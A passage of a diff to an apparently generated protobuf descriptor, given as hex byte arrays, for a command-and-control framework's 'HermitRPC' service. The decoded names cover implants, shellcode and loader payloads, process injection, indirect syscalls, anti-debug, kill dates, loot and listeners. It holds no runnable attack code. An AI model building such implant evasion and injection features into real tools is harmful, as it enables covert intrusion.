0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x54, 0x79, - 0x70, 0x65, 0x18, 0x09, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, - 0x74, 0x54, 0x79, 0x70, 0x65, 0x12, 0x20, 0x0a, 0x0b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x49, 0x6e, - 0x44, 0x61, 0x74, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x63, 0x68, 0x65, 0x63, - 0x6b, 0x49, 0x6e, 0x44, 0x61, 0x74, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, - 0x18, 0x0b, 0x20, 0x01, 0x28, 0x03, 0x52, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, 0x12, 0x16, 0x0a, - 0x06, 0x6a, 0x69, 0x74, 0x74, 0x65, 0x72, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x6a, - 0x69, 0x74, 0x74, 0x65, 0x72, 0x12, 0x1a, 0x0a, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, - 0x65, 0x18, 0x0d, 0x20, 0x01, 0x28, 0x03, 0x52, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, - 0x65, 0x12, 0x16, 0x0a, 0x06, 0x61, 0x65, 0x73, 0x4b, 0x65, 0x79, 0x18, 0x0e, 0x20, 0x01, 0x28, - 0x09, 0x52, 0x06, 0x61, 0x65, 0x73, 0x4b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x61, 0x65, 0x73, - 0x49, 0x56, 0x18, 0x0f, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x61, 0x65, 0x73, 0x49, 0x56, 0x22, - 0x38, 0x0a, 0x04, 0x54, 0x61, 0x73, 0x6b, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x18, - 0x01, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x12, 0x1c, 0x0a, 0x09, 0x61, - 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, - 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x3c, 0x0a, 0x04, 0x4c, 0x6f, 0x6f, - 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x01, - 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, - 0x16, 0x0a, 0x06, 0x66, 0x69, 0x6c, 0x74, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, - 0x06, 0x66, 0x69, 0x6c, 0x74, 0x65, 0x72, 0x32, 0xd8, 0x0b, 0x0a, 0x09, 0x48, 0x65, 0x72, 0x6d, - 0x69, 0x74, 0x52, 0x50, 0x43, 0x12, 0x30, 0x0a, 0x08, 0x53, 0x61, 0x79, 0x48, 0x65, 0x6c, 0x6c, - 0x6f, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, + 0x61, 0x6c, 0x6c, 0x73, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x6e, 0x74, 0x69, 0x44, 0x65, 0x62, 0x75, + 0x67, 0x18, 0x0f, 0x20, 0x01, 0x28, 0x08, 0x52, 0x09, 0x61, 0x6e, 0x74, 0x69, 0x44, 0x65, 0x62, + 0x75, 0x67, 0x22, 0xf3, 0x02, 0x0a, 0x0d, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x4c, 0x6f, + 0x61, 0x64, 0x65, 0x72, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, + 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, + 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, 0x02, + 0x6f, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, 0x04, + 0x61, 0x72, 0x63, 0x68, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, 0x68, + 0x12, 0x16, 0x0a, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, 0x72, 0x6f, + 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x18, 0x07, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, 0x70, 0x72, + 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x18, + 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, 0x0a, 0x05, + 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x09, 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, 0x70, 0x6f, + 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, 0x1c, 0x0a, 0x09, 0x74, 0x65, 0x63, 0x68, 0x6e, 0x69, + 0x71, 0x75, 0x65, 0x18, 0x0b, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x74, 0x65, 0x63, 0x68, 0x6e, + 0x69, 0x71, 0x75, 0x65, 0x12, 0x28, 0x0a, 0x0f, 0x70, 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x54, + 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0f, 0x70, + 0x72, 0x6f, 0x63, 0x65, 0x73, 0x73, 0x54, 0x6f, 0x49, 0x6e, 0x6a, 0x65, 0x63, 0x74, 0x12, 0x2a, + 0x0a, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, + 0x6c, 0x73, 0x18, 0x0d, 0x20, 0x01, 0x28, 0x08, 0x52, 0x10, 0x69, 0x6e, 0x64, 0x69, 0x72, 0x65, + 0x63, 0x74, 0x53, 0x79, 0x73, 0x63, 0x61, 0x6c, 0x6c, 0x73, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x6e, + 0x74, 0x69, 0x44, 0x65, 0x62, 0x75, 0x67, 0x18, 0x0e, 0x20, 0x01, 0x28, 0x08, 0x52, 0x09, 0x61, + 0x6e, 0x74, 0x69, 0x44, 0x65, 0x62, 0x75, 0x67, 0x22, 0x80, 0x02, 0x0a, 0x10, 0x50, 0x61, 0x79, + 0x6c, 0x6f, 0x61, 0x64, 0x53, 0x68, 0x65, 0x6c, 0x6c, 0x63, 0x6f, 0x64, 0x65, 0x12, 0x0e, 0x0a, + 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, + 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, + 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, + 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, 0x02, 0x6f, 0x73, 0x18, 0x04, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x05, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, 0x68, 0x12, 0x16, 0x0a, 0x06, 0x66, 0x6f, 0x72, + 0x6d, 0x61, 0x74, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x66, 0x6f, 0x72, 0x6d, 0x61, + 0x74, 0x12, 0x1c, 0x0a, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x18, 0x07, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x6c, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x63, 0x6f, 0x6c, 0x12, + 0x14, 0x0a, 0x05, 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x18, 0x08, 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, + 0x6c, 0x68, 0x6f, 0x73, 0x74, 0x12, 0x14, 0x0a, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x18, 0x09, + 0x20, 0x01, 0x28, 0x05, 0x52, 0x05, 0x6c, 0x70, 0x6f, 0x72, 0x74, 0x12, 0x12, 0x0a, 0x04, 0x74, + 0x79, 0x70, 0x65, 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x74, 0x79, 0x70, 0x65, 0x12, + 0x1a, 0x0a, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x18, 0x0b, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x08, 0x74, 0x79, 0x70, 0x65, 0x41, 0x72, 0x67, 0x73, 0x22, 0xed, 0x02, 0x0a, 0x05, + 0x41, 0x67, 0x65, 0x6e, 0x74, 0x12, 0x0e, 0x0a, 0x02, 0x69, 0x64, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x03, 0x52, 0x02, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x75, 0x75, 0x69, 0x64, 0x18, 0x02, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x04, 0x75, 0x75, 0x69, 0x64, 0x12, 0x12, 0x0a, 0x04, 0x6e, 0x61, 0x6d, + 0x65, 0x18, 0x03, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x0e, 0x0a, + 0x02, 0x69, 0x70, 0x18, 0x04, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x69, 0x70, 0x12, 0x0e, 0x0a, + 0x02, 0x6f, 0x73, 0x18, 0x05, 0x20, 0x01, 0x28, 0x09, 0x52, 0x02, 0x6f, 0x73, 0x12, 0x12, 0x0a, + 0x04, 0x61, 0x72, 0x63, 0x68, 0x18, 0x06, 0x20, 0x01, 0x28, 0x09, 0x52, 0x04, 0x61, 0x72, 0x63, + 0x68, 0x12, 0x1a, 0x0a, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, 0x65, 0x18, 0x07, 0x20, + 0x01, 0x28, 0x09, 0x52, 0x08, 0x68, 0x6f, 0x73, 0x74, 0x6e, 0x61, 0x6d, 0x65, 0x12, 0x20, 0x0a, + 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x55, 0x52, 0x4c, 0x18, 0x08, 0x20, 0x01, + 0x28, 0x09, 0x52, 0x0b, 0x6c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x55, 0x52, 0x4c, 0x12, + 0x20, 0x0a, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x54, 0x79, 0x70, 0x65, 0x18, 0x09, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x69, 0x6d, 0x70, 0x6c, 0x61, 0x6e, 0x74, 0x54, 0x79, 0x70, + 0x65, 0x12, 0x20, 0x0a, 0x0b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x49, 0x6e, 0x44, 0x61, 0x74, 0x65, + 0x18, 0x0a, 0x20, 0x01, 0x28, 0x09, 0x52, 0x0b, 0x63, 0x68, 0x65, 0x63, 0x6b, 0x49, 0x6e, 0x44, + 0x61, 0x74, 0x65, 0x12, 0x14, 0x0a, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, 0x18, 0x0b, 0x20, 0x01, + 0x28, 0x03, 0x52, 0x05, 0x73, 0x6c, 0x65, 0x65, 0x70, 0x12, 0x16, 0x0a, 0x06, 0x6a, 0x69, 0x74, + 0x74, 0x65, 0x72, 0x18, 0x0c, 0x20, 0x01, 0x28, 0x03, 0x52, 0x06, 0x6a, 0x69, 0x74, 0x74, 0x65, + 0x72, 0x12, 0x1a, 0x0a, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, 0x65, 0x18, 0x0d, 0x20, + 0x01, 0x28, 0x03, 0x52, 0x08, 0x6b, 0x69, 0x6c, 0x6c, 0x44, 0x61, 0x74, 0x65, 0x12, 0x16, 0x0a, + 0x06, 0x61, 0x65, 0x73, 0x4b, 0x65, 0x79, 0x18, 0x0e, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x61, + 0x65, 0x73, 0x4b, 0x65, 0x79, 0x12, 0x14, 0x0a, 0x05, 0x61, 0x65, 0x73, 0x49, 0x56, 0x18, 0x0f, + 0x20, 0x01, 0x28, 0x09, 0x52, 0x05, 0x61, 0x65, 0x73, 0x49, 0x56, 0x22, 0x38, 0x0a, 0x04, 0x54, + 0x61, 0x73, 0x6b, 0x12, 0x12, 0x0a, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x18, 0x01, 0x20, 0x01, 0x28, + 0x09, 0x52, 0x04, 0x74, 0x61, 0x73, 0x6b, 0x12, 0x1c, 0x0a, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, + 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x09, 0x61, 0x67, 0x65, 0x6e, + 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x22, 0x3c, 0x0a, 0x04, 0x4c, 0x6f, 0x6f, 0x74, 0x12, 0x1c, 0x0a, + 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x18, 0x01, 0x20, 0x01, 0x28, 0x09, + 0x52, 0x09, 0x61, 0x67, 0x65, 0x6e, 0x74, 0x4e, 0x61, 0x6d, 0x65, 0x12, 0x16, 0x0a, 0x06, 0x66, + 0x69, 0x6c, 0x74, 0x65, 0x72, 0x18, 0x02, 0x20, 0x01, 0x28, 0x09, 0x52, 0x06, 0x66, 0x69, 0x6c, + 0x74, 0x65, 0x72, 0x32, 0xd8, 0x0b, 0x0a, 0x09, 0x48, 0x65, 0x72, 0x6d, 0x69, 0x74, 0x52, 0x50, + 0x43, 0x12, 0x30, 0x0a, 0x08, 0x53, 0x61, 0x79, 0x48, 0x65, 0x6c, 0x6c, 0x6f, 0x12, 0x0f, 0x2e, + 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, + 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, + 0x65, 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0a, 0x47, 0x65, 0x74, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6f, + 0x6e, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, - 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0a, 0x47, 0x65, 0x74, 0x56, 0x65, - 0x72, 0x73, 0x69, 0x6f, 0x6e, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, - 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, - 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x10, 0x4f, - 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x12, + 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x38, 0x0a, 0x10, 0x4f, 0x70, 0x65, 0x72, 0x61, + 0x74, 0x6f, 0x72, 0x52, 0x65, 0x67, 0x69, 0x73, 0x74, 0x65, 0x72, 0x12, 0x0f, 0x2e, 0x72, 0x70, + 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x1a, 0x11, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, + 0x00, 0x12, 0x3b, 0x0a, 0x14, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x44, 0x65, 0x6c, + 0x65, 0x74, 0x65, 0x42, 0x79, 0x55, 0x75, 0x69, 0x64, 0x12, 0x0e, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, + 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x55, 0x75, 0x69, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, + 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x32, + 0x0a, 0x0f, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x47, 0x65, 0x74, 0x42, 0x79, 0x49, + 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, - 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, - 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x3b, 0x0a, 0x14, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, - 0x72, 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, 0x55, 0x75, 0x69, 0x64, 0x12, 0x0e, 0x2e, - 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x55, 0x75, 0x69, 0x64, 0x1a, 0x11, 0x2e, - 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, - 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0f, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x47, 0x65, - 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, - 0x2e, 0x49, 0x64, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, - 0x61, 0x74, 0x6f, 0x72, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, - 0x6f, 0x72, 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, - 0x62, 0x2e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, 0x35, - 0x0a, 0x0d, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x61, 0x72, 0x74, 0x12, - 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, - 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, - 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x11, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, - 0x72, 0x53, 0x74, 0x61, 0x72, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, - 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x35, 0x0a, - 0x10, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x6f, 0x70, 0x42, 0x79, 0x49, + 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4f, 0x70, 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x47, 0x65, + 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4f, 0x70, + 0x65, 0x72, 0x61, 0x74, 0x6f, 0x72, 0x22, 0x00, 0x30, 0x01, 0x12, 0x35, 0x0a, 0x0d, 0x4c, 0x69, + 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x61, 0x72, 0x74, 0x12, 0x0f, 0x2e, 0x72, 0x70, + 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x1a, 0x11, 0x2e, 0x63, + 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, + 0x00, 0x12, 0x36, 0x0a, 0x11, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x61, + 0x72, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, + 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x35, 0x0a, 0x10, 0x4c, 0x69, 0x73, + 0x74, 0x65, 0x6e, 0x65, 0x72, 0x53, 0x74, 0x6f, 0x70, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, + 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, + 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, + 0x12, 0x37, 0x0a, 0x12, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x44, 0x65, 0x6c, 0x65, + 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, + 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, + 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x39, 0x0a, 0x14, 0x4c, 0x69, 0x73, + 0x74, 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, - 0x67, 0x65, 0x22, 0x00, 0x12, 0x37, 0x0a, 0x12, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, - 0x44, 0x65, 0x6c, 0x65, 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, - 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, - 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x39, 0x0a, - 0x14, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, - 0x73, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, - 0x2e, 0x49, 0x64, 0x1a, 0x11, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, - 0x65, 0x73, 0x73, 0x61, 0x67, 0x65, 0x22, 0x00, 0x12, 0x49, 0x0a, 0x1a, 0x4c, 0x69, 0x73, 0x74, - 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x44, 0x65, 0x6c, 0x65, - 0x74, 0x65, 0x42, 0x79, 0x49, 0x64, 0x12, 0x16, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, - 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x50, 0x61, 0x79, 0x6c, 0x6f, 0x61, 0x64, 0x1a, 0x11, - 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x4d, 0x65, 0x73, 0x73, 0x61, 0x67, - 0x65, 0x22, 0x00, 0x12, 0x32, 0x0a, 0x0f, 0x4c, 0x69, 0x73, 0x74, 0x65, 0x6e, 0x65, 0x72, 0x47, - 0x65, 0x74, 0x42, 0x79, 0x49, 0x64, 0x12, 0x0c, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, 0x6f, 0x6e, 0x70, - 0x62, 0x2e, 0x49, 0x64, 0x1a, 0x0f, 0x2e, 0x72, 0x70, 0x63, 0x70, 0x62, 0x2e, 0x4c, 0x69, 0x73, - 0x74, 0x65, 0x6e, 0x65, 0x72, 0x22, 0x00, 0x12, 0x36, 0x0a, 0x0e, 0x4c, 0x69, 0x73, 0x74, 0x65, - 0x6e, 0x65, 0x72, 0x47, 0x65, 0x74, 0x41, 0x6c, 0x6c, 0x12, 0x0f, 0x2e, 0x63, 0x6f, 0x6d, 0x6d, - 0x6f, 0x6e, 0x70, 0x62, 0x2e, 0x45, 0x6d, 0x70, 0x74, 0x79, 0x1a, 0x0f, 0x2e, 0x72, 